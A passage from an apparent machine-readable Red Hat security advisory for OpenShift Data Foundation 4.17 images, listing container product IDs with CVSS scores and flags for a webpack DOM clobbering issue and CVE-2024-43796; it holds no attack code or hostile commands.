"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", 